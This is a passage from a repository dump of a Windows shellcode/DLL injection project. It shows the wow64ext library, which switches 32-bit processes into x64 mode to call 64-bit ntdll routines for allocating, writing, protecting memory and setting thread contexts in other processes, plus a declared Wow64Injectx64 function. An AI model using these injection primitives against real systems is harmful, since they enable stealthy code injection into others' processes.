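		jz _ls_e                                        ;// je _ls_e
		push dword ptr [edi]                            ;// push qword ptr [rdi]
		REX_W sub edi, 8                                ;// sub rdi, 8
		REX_W sub eax, 1                                ;// sub rax, 1
		jmp _ls                                         ;// jmp _ls
	_ls_e:                                              ;//
		;//
		;// create stack space for spilling registers   ;//
		REX_W sub esp, 0x20                             ;// sub rsp, 20h
		;//
		call func                                       ;// call qword ptr [func]
		;//
		;// cleanup stack                               ;//
		REX_W mov ecx, _argC.dw[0]                      ;// mov rcx, qword ptr [_argC]
		REX_W lea esp, dword ptr [esp + 8*ecx + 0x20]   ;// lea rsp, [rsp + rcx*8 + 20h]
		;//
		pop edi                                         ;// pop rdi
		;//
		// set return value                             ;//
		REX_W mov _rax.dw[0], eax                       ;// mov qword ptr [_rax], rax

		X64_End();

		;// back on a 32-bit stack: reload SS from DS and restore the saved ESP
		mov ax, ds
		mov ss, ax
		mov esp, back_esp
	}
	// The asm block has copied every stack argument it needs; close the va_list
	// so va_start is paired with va_end as the C standard requires.
	va_end(args);
	return _rax.v;
}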
144 | #pragma warning(pop)
145 |
// Copies sz bytes from the 64-bit virtual address srcMem into the 32-bit
// buffer dstMem. The copy runs in x64 mode so the full 64-bit source address
// can be used; dstMem and sz are 32-bit values whose upper halves are zero in
// RDI/RCX (see the asm comments). A null dstMem, a zero srcMem or a zero sz
// makes the call a no-op. Nothing here reports or catches a fault on an
// unreadable source range, so callers must only pass addresses they know to
// be mapped.
void getMem64(void* dstMem, DWORD64 srcMem, size_t sz)
{
	if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
		return;

	reg64 _src = { srcMem };

	__asm
	{
		X64_Start();

		;// below code is compiled as x86 inline asm, but it is executed as x64 code
		;// that's why it need sometimes REX_W() macro, right column contains detailed
		;// transcription how it will be interpreted by CPU

		push edi                                ;// push rdi
		push esi                                ;// push rsi
		;//
		mov edi, dstMem                         ;// mov edi, dword ptr [dstMem]     ; high part of RDI is zeroed
		REX_W mov esi, _src.dw[0]               ;// mov rsi, qword ptr [_src]
		mov ecx, sz                             ;// mov ecx, dword ptr [sz]         ; high part of RCX is zeroed
		;//
		;// copy sz/4 dwords with rep movsd, then the 0..3 remaining bytes
		mov eax, ecx                            ;// mov eax, ecx
		and eax, 3                              ;// and eax, 3
		shr ecx, 2                              ;// shr ecx, 2
		;//
		rep movsd                               ;// rep movs dword ptr [rdi], dword ptr [rsi]
		;//
		test eax, eax                           ;// test eax, eax
		je _move_0                              ;// je _move_0
		cmp eax, 1                              ;// cmp eax, 1
		je _move_1                              ;// je _move_1
		;//
		movsw                                   ;// movs word ptr [rdi], word ptr [rsi]
		cmp eax, 2                              ;// cmp eax, 2
		je _move_0                              ;// je _move_0
		;//
	_move_1:                                    ;//
		movsb                                   ;// movs byte ptr [rdi], byte ptr [rsi]
		;//
	_move_0:                                    ;//
		pop esi                                 ;// pop rsi
		pop edi                                 ;// pop rdi

		X64_End();
	}
}
193 |
194 | //bool cmpMem64(void* dstMem, DWORD64 srcMem, size_t sz)
195 | //{
196 | // if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
197 | // return false;
198 | //
199 | // bool result = false;
200 | // reg64 _src = { srcMem };
201 | // __asm
202 | // {
203 | // X64_Start();
204 | //
205 | // ;// below code is compiled as x86 inline asm, but it is executed as x64 code
206 | // ;// that's why it need sometimes REX_W() macro, right column contains detailed
207 | // ;// transcription how it will be interpreted by CPU
208 | //
209 | // push edi ;// push rdi
210 | // push esi ;// push rsi
211 | // ;//
212 | // mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
213 | // REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
214 | // mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
215 | // ;//
216 | // mov eax, ecx ;// mov eax, ecx
217 | // and eax, 3 ;// and eax, 3
218 | // shr ecx, 2 ;// shr ecx, 2
219 | // ;//
220 | // repe cmpsd ;// repe cmps dword ptr [rsi], dword ptr [rdi]
221 | // jnz _ret_false ;// jnz _ret_false
222 | // ;//
223 | // test eax, eax ;// test eax, eax
224 | // je _move_0 ;// je _move_0
225 | // cmp eax, 1 ;// cmp eax, 1
226 | // je _move_1 ;// je _move_1
227 | // ;//
228 | // cmpsw ;// cmps word ptr [rsi], word ptr [rdi]
229 | // jnz _ret_false ;// jnz _ret_false
230 | // cmp eax, 2 ;// cmp eax, 2
231 | // je _move_0 ;// je _move_0
232 | // ;//
233 | //_move_1: ;//
234 | // cmpsb ;// cmps byte ptr [rsi], byte ptr [rdi]
235 | // jnz _ret_false ;// jnz _ret_false
236 | // ;//
237 | //_move_0: ;//
238 | // mov result, 1 ;// mov byte ptr [result], 1
239 | // ;//
240 | //_ret_false: ;//
241 | // pop esi ;// pop rsi
242 | // pop edi ;// pop rdi
243 | //
244 | // X64_End();
245 | // }
246 | //
247 | // return result;
248 | //}
249 |
// Returns the 64-bit address of the current thread's TEB64.
// The value is taken from R12 while in x64 mode; the original author's note
// below states that this register holds the TEB64 pointer in WoW64 processes
// (an undocumented convention, so it should be re-verified on new Windows
// builds). Because the push happens in x64 mode, the pop transfers the full
// 8 bytes into reg, overwriting the zero initial value.
DWORD64 getTEB64()
{
	reg64 reg;
	reg.v = 0;

	X64_Start();
	// R12 register should always contain pointer to TEB64 in WoW64 processes
	X64_Push(_R12);
	// below pop will pop QWORD from stack, as we're in x64 mode now
	__asm pop reg.dw[0]
	X64_End();

	return reg.v;
}
264 |
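// 64-bit counterpart of GetModuleHandle for the current WoW64 process: walks
// the 64-bit PEB's InLoadOrderModuleList (read through getMem64) and returns
// the DllBase of the first entry whose BaseDllName matches lpModuleName
// case-insensitively (ASCII folding only, see _mywcsicmp).
//   lpModuleName - module base name such as L"ntdll.dll"
// Returns the 64-bit module base, or 0 when the module is not found, the
// name is null, or a temporary buffer cannot be allocated.
// Fix: BaseDllName is a counted string that need not be NUL-terminated, so
// the copy now always carries a terminator and the null-name case is guarded.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName)
{
	if (nullptr == lpModuleName)
		return 0;

	TEB64 teb64;
	getMem64(&teb64, getTEB64(), sizeof(TEB64));

	PEB64 peb64;
	getMem64(&peb64, teb64.ProcessEnvironmentBlock, sizeof(PEB64));
	PEB_LDR_DATA64 ldr;
	getMem64(&ldr, peb64.Ldr, sizeof(PEB_LDR_DATA64));

	// Address of the list head itself; the walk stops when Flink wraps back to it.
	DWORD64 LastEntry = peb64.Ldr + offsetof(PEB_LDR_DATA64, InLoadOrderModuleList);
	LDR_DATA_TABLE_ENTRY64 head;
	head.InLoadOrderLinks.Flink = ldr.InLoadOrderModuleList.Flink;

	DWORD64 dwRet64 = 0;
	do {
		getMem64(&head, head.InLoadOrderLinks.Flink, sizeof(LDR_DATA_TABLE_ENTRY64));

		// One zeroed wchar_t beyond MaximumLength guarantees a terminator even
		// when the loader's buffer is completely filled, so _mywcsicmp cannot
		// read past the end of the copy.
		size_t bufLen = (size_t)head.BaseDllName.MaximumLength + sizeof(wchar_t);
		wchar_t* tempBuf = (wchar_t*)malloc(bufLen);
		if (nullptr == tempBuf)
			return 0;
		memset(tempBuf, 0, bufLen);
		getMem64(tempBuf, head.BaseDllName.Buffer, head.BaseDllName.MaximumLength);

		bool matched = (0 == _mywcsicmp(lpModuleName, tempBuf));
		free(tempBuf);
		tempBuf = nullptr;
		if (matched) {
			dwRet64 = head.DllBase;
			break;
		}
	} while (head.InLoadOrderLinks.Flink != LastEntry);

	return dwRet64;
}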
302 |
// Returns the 64-bit base address of ntdll.dll, resolved once through
// GetModuleHandle64 and cached in a function-local static. A failed lookup
// (0) is not cached, so the next call retries.
DWORD64 getNTDLL64()
{
	static DWORD64 cachedBase = 0;
	if (0 == cachedBase)
		cachedBase = GetModuleHandle64(L"ntdll.dll");
	return cachedBase;
}
312 |
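// Locates LdrGetProcedureAddress in the 64-bit ntdll by parsing its export
// directory. Every byte of the module is fetched with getMem64 because the
// module lives in the 64-bit address space and cannot be dereferenced from
// 32-bit code.
// Returns the 64-bit address of the export, or 0 if ntdll64 is not loaded,
// it has no export directory or no exports, an allocation fails, or the name
// is not present.
// Fixes: the previous loop cast (modBase + nameRva) to a 32-bit char* and read
// it directly, which truncates the address whenever ntdll64 is mapped above
// 4 GB; it also iterated NumberOfFunctions entries over the NumberOfNames-sized
// name/ordinal tables and did not bound-check the ordinal. The name is now
// read through getMem64, the tables are sized per the PE export layout and the
// ordinal is checked against NumberOfFunctions. The export name is compared
// exactly (export names are case-sensitive).
DWORD64 getLdrGetProcedureAddress()
{
	DWORD64 modBase = getNTDLL64();
	if (0 == modBase)
		return 0;

	IMAGE_DOS_HEADER idh;
	getMem64(&idh, modBase, sizeof(idh));

	IMAGE_NT_HEADERS64 inh;
	getMem64(&inh, modBase + idh.e_lfanew, sizeof(IMAGE_NT_HEADERS64));

	IMAGE_DATA_DIRECTORY& idd = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
	if (0 == idd.VirtualAddress)
		return 0;

	IMAGE_EXPORT_DIRECTORY ied;
	getMem64(&ied, modBase + idd.VirtualAddress, sizeof(ied));
	// Nothing to search; also avoids malloc(0) below.
	if (0 == ied.NumberOfFunctions || 0 == ied.NumberOfNames)
		return 0;

	// AddressOfFunctions has NumberOfFunctions entries; AddressOfNames and
	// AddressOfNameOrdinals are parallel arrays of NumberOfNames entries.
	DWORD* rvaTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfFunctions);
	WORD* ordTable = (WORD*)malloc(sizeof(WORD)*ied.NumberOfNames);
	DWORD* nameTable = (DWORD*)malloc(sizeof(DWORD)*ied.NumberOfNames);

	DWORD64 dw64 = 0;
	if ((nullptr != rvaTable) && (nullptr != ordTable) && (nullptr != nameTable))
	{
		memset(rvaTable, 0, sizeof(DWORD)*ied.NumberOfFunctions);
		getMem64(rvaTable, modBase + ied.AddressOfFunctions, sizeof(DWORD)*ied.NumberOfFunctions);
		memset(ordTable, 0, sizeof(WORD)*ied.NumberOfNames);
		getMem64(ordTable, modBase + ied.AddressOfNameOrdinals, sizeof(WORD)*ied.NumberOfNames);
		memset(nameTable, 0, sizeof(DWORD)*ied.NumberOfNames);
		getMem64(nameTable, modBase + ied.AddressOfNames, sizeof(DWORD)*ied.NumberOfNames);

		// lazy search, there is no need to use binsearch for just one function
		static const char kName[] = "LdrGetProcedureAddress";
		char tmpName[sizeof(kName)];
		for (DWORD i = 0; i < ied.NumberOfNames; i++)
		{
			memset(tmpName, 0, sizeof(tmpName));
			getMem64(tmpName, modBase + nameTable[i], sizeof(tmpName));
			// sizeof(kName) includes the terminator, so a longer export whose
			// prefix matches does not compare equal.
			if (0 != memcmp(tmpName, kName, sizeof(kName)))
				continue;
			if (ordTable[i] < ied.NumberOfFunctions)
				dw64 = modBase + rvaTable[ordTable[i]];
			break;
		}
	}

	free(rvaTable);
	rvaTable = nullptr;
	free(ordTable);
	ordTable = nullptr;
	free(nameTable);
	nameTable = nullptr;

	return dw64;
}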
388 |
// Maps an NTSTATUS returned by a 64-bit call to a Win32 error code and stores
// it as the calling thread's last error, using RtlNtStatusToDosError and
// RtlSetLastWin32Error from the 32-bit ntdll. Both routines are resolved on
// first use and cached; if either cannot be resolved the call does nothing.
/*extern "C" __declspec(dllexport) */VOID __cdecl SetLastErrorFromX64Call(DWORD64 status)
{
	typedef ULONG (WINAPI *RtlNtStatusToDosError_t)(NTSTATUS Status);
	typedef ULONG (WINAPI *RtlSetLastWin32Error_t)(NTSTATUS Status);

	static RtlNtStatusToDosError_t pfnToDosError = nullptr;
	static RtlSetLastWin32Error_t pfnSetLastError = nullptr;

	bool resolved = (nullptr != pfnToDosError) && (nullptr != pfnSetLastError);
	if (!resolved)
	{
		HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
		pfnToDosError = (RtlNtStatusToDosError_t)GetProcAddress(ntdll, "RtlNtStatusToDosError");
		pfnSetLastError = (RtlSetLastWin32Error_t)GetProcAddress(ntdll, "RtlSetLastWin32Error");
		resolved = (nullptr != pfnToDosError) && (nullptr != pfnSetLastError);
	}

	if (resolved)
		pfnSetLastError(pfnToDosError((DWORD)status));
}
409 |
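// 64-bit GetProcAddress: resolves funcName in the 64-bit module hModule by
// calling ntdll64!LdrGetProcedureAddress through X64Call.
//   hModule  - 64-bit module base (e.g. from GetModuleHandle64)
//   funcName - ANSI export name
// Returns the 64-bit address of the export, or 0 if LdrGetProcedureAddress
// cannot be located, funcName is null or too long for a 16-bit counted
// string, or the lookup fails (the NTSTATUS is not surfaced; funcRet stays 0).
// Fix: a null funcName previously reached strlen(); over-long names silently
// wrapped the WORD length fields.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName)
{
	static DWORD64 _LdrGetProcedureAddress = 0;
	if (0 == _LdrGetProcedureAddress)
	{
		_LdrGetProcedureAddress = getLdrGetProcedureAddress();
		if (0 == _LdrGetProcedureAddress)
			return 0;
	}

	if (nullptr == funcName)
		return 0;
	size_t nameLen = strlen(funcName);
	// Length and MaximumLength are 16-bit byte counts; MaximumLength needs
	// room for the terminator, so the name itself must fit below 0xFFFF.
	if (nameLen >= 0xFFFF)
		return 0;

	// The name is passed as a counted string (Length in bytes, MaximumLength
	// including the terminator) with a 64-bit Buffer pointer, which is what
	// LdrGetProcedureAddress expects for its ANSI name argument.
	_UNICODE_STRING_T fName = { 0 };
	fName.Buffer = (DWORD64)funcName;
	fName.Length = (WORD)nameLen;
	fName.MaximumLength = (WORD)(nameLen + 1);
	DWORD64 funcRet = 0;
	// arguments: ModuleHandle, FunctionName, Ordinal (unused when a name is given), out FunctionAddress
	X64Call(_LdrGetProcedureAddress, 4, (DWORD64)hModule, (DWORD64)&fName, (DWORD64)0, (DWORD64)&funcRet);
	return funcRet;
}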
428 |
// 64-bit VirtualQueryEx built on ntdll64!NtQueryVirtualMemory, which is
// resolved once and cached. On a non-success NTSTATUS the thread's last error
// is set from that status. Returns the byte count reported by the call, cast
// to SIZE_T, or 0 if the NT routine could not be resolved.
/*extern "C" __declspec(dllexport) */SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength)
{
	static DWORD64 pfnQuery = 0;
	if (0 == pfnQuery)
	{
		pfnQuery = GetProcAddress64(getNTDLL64(), "NtQueryVirtualMemory");
		if (0 == pfnQuery)
			return 0;
	}

	DWORD64 bytesReturned = 0;
	// MemoryInformationClass 0 is MemoryBasicInformation.
	const DWORD64 status = X64Call(pfnQuery, 6,
		(DWORD64)hProcess, lpAddress, (DWORD64)0,
		(DWORD64)lpBuffer, (DWORD64)dwLength, (DWORD64)&bytesReturned);
	if (STATUS_SUCCESS != status)
		SetLastErrorFromX64Call(status);
	return (SIZE_T)bytesReturned;
}
444 |
// 64-bit VirtualAllocEx built on ntdll64!NtAllocateVirtualMemory (resolved
// once and cached). Returns the 64-bit base address the call reported, or 0
// (FALSE) when the NT routine cannot be resolved or the call fails; in the
// latter case the last error is set from the NTSTATUS.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
{
	static DWORD64 pfnAlloc = 0;
	if (0 == pfnAlloc)
	{
		pfnAlloc = GetProcAddress64(getNTDLL64(), "NtAllocateVirtualMemory");
		if (0 == pfnAlloc)
			return 0;
	}

	// BaseAddress and RegionSize are passed by pointer and updated in place,
	// so hand the call 64-bit copies rather than the caller's values.
	DWORD64 baseAddress = lpAddress;
	DWORD64 regionSize = dwSize;
	const DWORD64 status = X64Call(pfnAlloc, 6,
		(DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)0,
		(DWORD64)&regionSize, (DWORD64)flAllocationType, (DWORD64)flProtect);
	if (STATUS_SUCCESS == status)
		return baseAddress;

	SetLastErrorFromX64Call(status);
	return FALSE;
}
466 |
// 64-bit VirtualFreeEx built on ntdll64!NtFreeVirtualMemory (resolved once
// and cached). Returns TRUE on success; FALSE (with the last error set from
// the NTSTATUS) on failure, and 0 if the NT routine cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType)
{
	static DWORD64 pfnFree = 0;
	if (0 == pfnFree)
	{
		pfnFree = GetProcAddress64(getNTDLL64(), "NtFreeVirtualMemory");
		if (0 == pfnFree)
			return 0;
	}

	// BaseAddress and RegionSize are in/out pointer arguments; use 64-bit copies.
	DWORD64 baseAddress = lpAddress;
	DWORD64 regionSize = dwSize;
	const DWORD64 status = X64Call(pfnFree, 4,
		(DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)&regionSize, (DWORD64)dwFreeType);
	if (STATUS_SUCCESS == status)
		return TRUE;

	SetLastErrorFromX64Call(status);
	return FALSE;
}
488 |
// 64-bit VirtualProtectEx built on ntdll64!NtProtectVirtualMemory (resolved
// once and cached). lpflOldProtect is handed to the NT call directly and
// receives the previous protection. Returns TRUE on success; FALSE (with the
// last error set from the NTSTATUS) on failure, and 0 if the NT routine
// cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect)
{
	static DWORD64 pfnProtect = 0;
	if (0 == pfnProtect)
	{
		pfnProtect = GetProcAddress64(getNTDLL64(), "NtProtectVirtualMemory");
		if (0 == pfnProtect)
			return 0;
	}

	// BaseAddress and RegionSize are in/out pointer arguments; use 64-bit copies.
	DWORD64 baseAddress = lpAddress;
	DWORD64 regionSize = dwSize;
	const DWORD64 status = X64Call(pfnProtect, 5,
		(DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)&regionSize,
		(DWORD64)flNewProtect, (DWORD64)lpflOldProtect);
	if (STATUS_SUCCESS == status)
		return TRUE;

	SetLastErrorFromX64Call(status);
	return FALSE;
}
510 |
// 64-bit ReadProcessMemory built on ntdll64!NtReadVirtualMemory (resolved
// once and cached). On success the number of bytes reported by the call is
// stored through lpNumberOfBytesRead (if non-null) and TRUE is returned. On
// any non-success NTSTATUS (a partial copy included) the count is left
// untouched, the last error is set from the status and FALSE is returned;
// 0 is returned if the NT routine cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
{
	static DWORD64 pfnRead = 0;
	if (0 == pfnRead)
	{
		pfnRead = GetProcAddress64(getNTDLL64(), "NtReadVirtualMemory");
		if (0 == pfnRead)
			return 0;
	}

	// 64-bit slot for the byte count, seeded from the caller's value.
	DWORD64 bytesDone = 0;
	if (lpNumberOfBytesRead)
		bytesDone = *lpNumberOfBytesRead;

	const DWORD64 status = X64Call(pfnRead, 5,
		(DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&bytesDone);
	if (STATUS_SUCCESS != status)
	{
		SetLastErrorFromX64Call(status);
		return FALSE;
	}

	if (lpNumberOfBytesRead)
		*lpNumberOfBytesRead = (SIZE_T)bytesDone;
	return TRUE;
}
534 |
// 64-bit WriteProcessMemory built on ntdll64!NtWriteVirtualMemory (resolved
// once and cached). On success the number of bytes reported by the call is
// stored through lpNumberOfBytesWritten (if non-null) and TRUE is returned.
// On any non-success NTSTATUS the count is left untouched, the last error is
// set from the status and FALSE is returned; 0 is returned if the NT routine
// cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
{
	static DWORD64 pfnWrite = 0;
	if (0 == pfnWrite)
	{
		pfnWrite = GetProcAddress64(getNTDLL64(), "NtWriteVirtualMemory");
		if (0 == pfnWrite)
			return 0;
	}

	// 64-bit slot for the byte count, seeded from the caller's value.
	DWORD64 bytesDone = 0;
	if (lpNumberOfBytesWritten)
		bytesDone = *lpNumberOfBytesWritten;

	const DWORD64 status = X64Call(pfnWrite, 5,
		(DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&bytesDone);
	if (STATUS_SUCCESS != status)
	{
		SetLastErrorFromX64Call(status);
		return FALSE;
	}

	if (lpNumberOfBytesWritten)
		*lpNumberOfBytesWritten = (SIZE_T)bytesDone;
	return TRUE;
}
558 |
// 64-bit GetThreadContext built on ntdll64!NtGetContextThread (resolved once
// and cached). lpContext must point to a _CONTEXT64 whose ContextFlags select
// the parts to retrieve; it is passed to the NT call as-is. Returns TRUE on
// success, FALSE (with the last error set from the NTSTATUS) on failure, and
// 0 if the NT routine cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
{
	static DWORD64 pfnGetContext = 0;
	if (0 == pfnGetContext)
	{
		pfnGetContext = GetProcAddress64(getNTDLL64(), "NtGetContextThread");
		if (0 == pfnGetContext)
			return 0;
	}

	const DWORD64 status = X64Call(pfnGetContext, 2, (DWORD64)hThread, (DWORD64)lpContext);
	if (STATUS_SUCCESS == status)
		return TRUE;

	SetLastErrorFromX64Call(status);
	return FALSE;
}
577 |
// 64-bit SetThreadContext built on ntdll64!NtSetContextThread (resolved once
// and cached). lpContext is passed to the NT call as-is; its ContextFlags
// select which parts are applied. Returns TRUE on success, FALSE (with the
// last error set from the NTSTATUS) on failure, and 0 if the NT routine
// cannot be resolved.
/*extern "C" __declspec(dllexport) */BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
{
	static DWORD64 pfnSetContext = 0;
	if (0 == pfnSetContext)
	{
		pfnSetContext = GetProcAddress64(getNTDLL64(), "NtSetContextThread");
		if (0 == pfnSetContext)
			return 0;
	}

	const DWORD64 status = X64Call(pfnSetContext, 2, (DWORD64)hThread, (DWORD64)lpContext);
	if (STATUS_SUCCESS == status)
		return TRUE;

	SetLastErrorFromX64Call(status);
	return FALSE;
}
596 | #endif
597 |
598 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/x32ext.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/wow64ext/x32ext.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/x32ext.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #ifndef _WIN64
4 | #include
5 |
6 | BOOL Wow64Injectx64(HANDLE hProcess, LPCTSTR lpDllFilePath);
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/x64/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/x64/Release/vc90.pdb
--------------------------------------------------------------------------------
/Windows平台下高级Shellcode编程技术.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/Windows平台下高级Shellcode编程技术.doc
--------------------------------------------------------------------------------